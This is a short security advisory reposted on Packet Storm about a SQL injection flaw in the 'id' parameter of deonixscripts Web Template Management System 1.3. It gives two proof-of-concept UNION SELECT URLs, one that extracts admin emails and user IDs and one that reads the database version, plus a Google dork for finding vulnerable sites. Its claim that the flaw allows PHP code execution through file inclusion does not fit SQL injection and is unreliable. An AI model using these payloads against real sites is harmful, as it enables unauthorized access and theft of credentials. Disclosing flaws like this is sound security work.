Web Template Management System version 1.3 suffers from a remote SQL injection vulnerability.
9bea5fdd58ecedba219929e700c129013ba97e4cb7fc6f4a064e5cfccf47f407#############################Nyubicrew Community################################
#
# deonixscripts (id) Remote Sql Injection
#
# vendor : http://www.deonixscripts.com/
# Demo : http://www.deonixscripts.com/demo/tplmgt13/
#
#################################################################################
#
#
# Bug Found By :home_edition2001 a.k.a (bius) (31-08-2007)
#
# contact: bius22@mac.com
#
# Website : www.solpotcrew.org/adv/home_edition2001-adv-03.txt
#
################################################################################
#
#
# Greetz: Nyubi aka solpot , Matdhule , S4M3K ,[DEVIL_MAY_CRY] , iFX , Scr3W_W0rM ,
# nakkuta , bukan-diriku , POET , Th0nk , mbako_semprul , Fungky , airsoul
# wong_edan , ^s0n_g0ku^ , aLiiF , sparta-x , dudut , xtremeshell , Bithedz
# th3sn0wbr4in , ReAksi , X8 , junkiest , K1tk4t , masboi , saritem
# x-ace , replacement_killer , LamerCrew , k1n9k0ng ,[K]ompoR_Meledu[K]
# and all member #nyubicrew @ irc.mildnet.org
# especially thx to str0ke @ milw0rm.com
#
###############################################################################
Input passed to the "id" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by Remote Sql Injection
P.O.C :
http://localhost/index.php?action=readmore&id=-1%20union%20select%200,1,concat(email,0x3a,userid,0x3a,adminid),3%20from%20admin/*
http://localhost/index.php?action=readmore&id=-1%20union%20select%200,1,@@version,3/*
Google Dork : Powered by: deonixscripts.com
######################MY Special Girl JUST FOR U Ula#########################
######################################E.O.F##################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed